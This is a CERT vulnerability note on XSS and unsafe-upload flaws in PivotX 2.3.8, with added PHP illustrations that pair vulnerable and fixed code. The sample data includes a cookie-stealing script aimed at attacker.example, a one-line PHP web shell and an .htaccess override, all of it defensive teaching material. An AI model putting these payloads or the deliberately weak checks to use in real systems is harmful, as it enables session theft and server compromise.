
CERT Coordination Center

PivotX 2.3.8 contains multiple vulnerabilities

Vulnerability Note VU#901156

Original Release Date: 2014-04-11 | Last Revised: 2014-07-24

Overview

PivotX 2.3.8, and possibly earlier versions, contains cross-site scripting (CWE-79) and unsafe file upload (CWE-434) vulnerabilities.

Description

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-0341
The PivotX overview screens rendered user-controlled content without neutralizing it, so script injected by one user could execute in the browser of any other user who viewed those screens. The following code commits provide the details.
http://sourceforge.net/p/pivot-weblog/code/4349/
http://sourceforge.net/p/pivot-weblog/code/4345/
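The pattern behind a CWE-79 finding in a listing screen, as an added illustration that is not PivotX's own code and does not reproduce the linked commits: a row renderer that interpolates a user-set entry title straight into HTML, beside one that encodes at output time for each context. The entry array, the field names and the sample payload are all constructed for this example.

```php
<?php
// Added illustration for CWE-79, not PivotX's own code. It models an
// overview screen that lists entries whose title was set by a user.

// VULNERABLE: interpolates the title straight into HTML. A title such as
// <script>...</script> becomes live markup for every user who views the list.
function renderRowUnsafe(array $entry): string
{
    return "<tr><td>{$entry['title']}</td>"
         . "<td><a href=\"edit.php?id={$entry['id']}&title={$entry['title']}\">edit</a></td></tr>";
}

// Encoder for the HTML body and quoted-attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// FIXED: encode at output time, per context. The numeric id is cast to int,
// the title is HTML-encoded in the cell, and in the href it is URL-encoded
// first and then HTML-encoded as attribute content.
function renderRowSafe(array $entry): string
{
    $id    = (int) $entry['id'];
    $title = h($entry['title']);
    $href  = h('edit.php?id=' . $id . '&title=' . rawurlencode($entry['title']));
    return "<tr><td>{$title}</td><td><a href=\"{$href}\">edit</a></td></tr>";
}

// Constructed sample entry (not taken from any real PivotX install).
$entry = [
    'id'    => '7',
    'title' => '<script>location="http://attacker.example/?c="+document.cookie</script>',
];

echo renderRowUnsafe($entry), "\n"; // script tag emitted as live markup
echo renderRowSafe($entry), "\n";   // &lt;script&gt;... shown as inert text
```

The safe renderer encodes at the point of output rather than on storage, which is what lets the same stored title be shown correctly in an HTML cell, an attribute and a URL query without double-encoding.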

CWE-434: Unrestricted Upload of File with Dangerous Type - CVE-2014-0342
The check applied to uploaded files did not take the file extension into account, so a file carrying a dangerous extension (one the web server might execute as a script) could be accepted. The following code commit provides the details.
http://sourceforge.net/p/pivot-weblog/code/4347/
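What an upload filter that ignores the extension looks like next to one that includes it, as an added illustration that is not PivotX's own code and does not reproduce the linked commit. The weak check trusts only the client-declared Content-Type; the hardened one applies an extension allowlist to the last extension, rejects dotfiles and embedded NULs, sniffs the file's magic bytes, and stores the file under a server-generated name. The function names, the allowlist, the magic-byte table and the sample uploads are constructed for this example; it needs PHP 7.1 or later.

```php
<?php
// Added illustration for CWE-434, not PivotX's own code. The weak check
// stands in for the general pattern the note describes: an upload filter
// that never looks at the file extension.

// WEAK: trusts only the client-declared Content-Type. A file named
// "shell.php" sent as "image/png" passes, and a web server that executes
// .php files in the upload directory will run it.
function weakUploadCheck(string $clientName, string $declaredType): bool
{
    $allowedTypes = ['image/png', 'image/jpeg', 'image/gif'];
    return in_array($declaredType, $allowedTypes, true);
}

// HARDENED: extension allowlist plus a server-side magic-byte check.
// Returns the normalised extension on success, or null on rejection.
function strictUploadCheck(string $clientName, string $contents): ?string
{
    // Allowed extensions mapped to the magic bytes each must start with.
    $allowed = [
        'png'  => "\x89PNG\r\n\x1a\n",
        'jpg'  => "\xFF\xD8\xFF",
        'jpeg' => "\xFF\xD8\xFF",
        'gif'  => "GIF8",
    ];

    // Drop any directory component the client supplied and the trailing
    // dots/spaces some filesystems silently strip.
    $base = basename(str_replace('\\', '/', $clientName));
    $base = rtrim($base, ". ");
    if ($base === '' || strpos($base, "\0") !== false) {
        return null; // empty name or embedded NUL
    }

    // Judge the LAST extension, so "cover.png.php" is treated as .php.
    $dot = strrpos($base, '.');
    if ($dot === false || $dot === 0) {
        return null; // no extension, or a dotfile such as ".htaccess"
    }
    $ext = strtolower(substr($base, $dot + 1));
    if (!isset($allowed[$ext])) {
        return null;
    }

    // Do not trust the declared type: inspect the bytes actually uploaded.
    $magic = $allowed[$ext];
    if (strncmp($contents, $magic, strlen($magic)) !== 0) {
        return null;
    }
    return $ext;
}

// Never reuse the client's name on disk: generate one and append only the
// validated extension, so the stored path is fully server-controlled.
function storedName(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample uploads (not real submissions):
// [client file name, declared Content-Type, leading bytes of the body]
$samples = [
    ['avatar.png',    'image/png',  "\x89PNG\r\n\x1a\n..."],
    ['shell.php',     'image/png',  "<?php system(\$_GET['c']); ?>"],
    ['cover.png.php', 'image/png',  "<?php echo 1; ?>"],
    ['.htaccess',     'image/gif',  "AddType application/x-httpd-php .gif"],
    ['Photo.JPG',     'image/jpeg', "\xFF\xD8\xFF\xE0..."],
];

foreach ($samples as [$name, $type, $bytes]) {
    $weak   = weakUploadCheck($name, $type) ? 'accept' : 'reject';
    $ext    = strictUploadCheck($name, $bytes);
    $strict = $ext === null ? 'reject' : 'accept as ' . storedName($ext);
    printf("%-16s weak: %-7s strict: %s\n", $name, $weak, $strict);
}
```

The weak check accepts every sample because each declares an image type; the hardened check accepts only avatar.png and Photo.JPG. The extension check is necessary but not sufficient on its own: the upload directory should also be served with script execution disabled, so that a mistake in the allowlist does not turn into code execution.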

The CVSS score below is for CVE-2014-0342.

Impact

A remote attacker with an authenticated PivotX account may be able to inject arbitrary script into a web page viewed by other users, or upload a file of a dangerous type that the server was not meant to accept.

Solution

Apply an Update

PivotX 2.3.9 has been released to address these vulnerabilities.

Vendor Information

Vendor: PivotX
Status: Affected
Updated: April 11, 2014

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.


CVSS Metrics (CVSSv2, scored for CVE-2014-0342)

Group          Score   Vector
Base           6.5     AV:N/AC:L/Au:S/C:P/I:P/A:P
Temporal       5.1     E:POC/RL:OF/RC:C
Environmental  1.3     CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

Acknowledgements

Thanks to Diego García for reporting these vulnerabilities.

This document was written by Jared Allar.

Other Information

CVE IDs: CVE-2014-0341, CVE-2014-0342
Date Public: 2014-03-05
Date First Published: 2014-04-11
Date Last Updated: 2014-07-24 21:10 UTC
Document Revision: 7

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.